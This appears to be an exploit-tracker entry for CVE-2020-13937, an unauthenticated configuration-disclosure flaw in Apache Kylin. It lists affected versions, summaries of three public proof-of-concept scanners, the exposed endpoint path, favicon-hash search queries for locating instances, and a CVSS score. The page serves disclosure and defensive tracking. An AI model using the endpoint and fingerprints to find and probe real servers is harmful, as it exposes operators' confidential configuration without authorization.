Exploitation Summary
EIP tracks 3 public exploits for CVE-2020-13937. PoCs published by yaunsky, Al1ex, kailing0220. A Nuclei detection template is also available.
AI-analyzed exploit summary This repository contains a Python script that scans for the Apache Kylin API unauthorized access vulnerability (CVE-2020-13937). It checks if the `/kylin/api/admin/config` endpoint is accessible without authentication.
Description
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.
Exploits (3)
This repository contains a Python script that scans for the Apache Kylin API unauthorized access vulnerability (CVE-2020-13937). It checks if the `/kylin/api/admin/config` endpoint is accessible without authentication.
This repository describes an information disclosure vulnerability in Apache Kylin where an unauthenticated API endpoint exposes sensitive configuration details. The exploit involves accessing a specific RESTful API endpoint to retrieve confidential information.
This is a functional PoC for CVE-2020-13937, an unauthorized access vulnerability in Apache Kylin. It checks for the exposure of configuration information via an unauthenticated RESTful API endpoint.
Nuclei Templates (1)
http.favicon.hash:-186961397
icon_hash=-186961397
References (1)
Scores
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N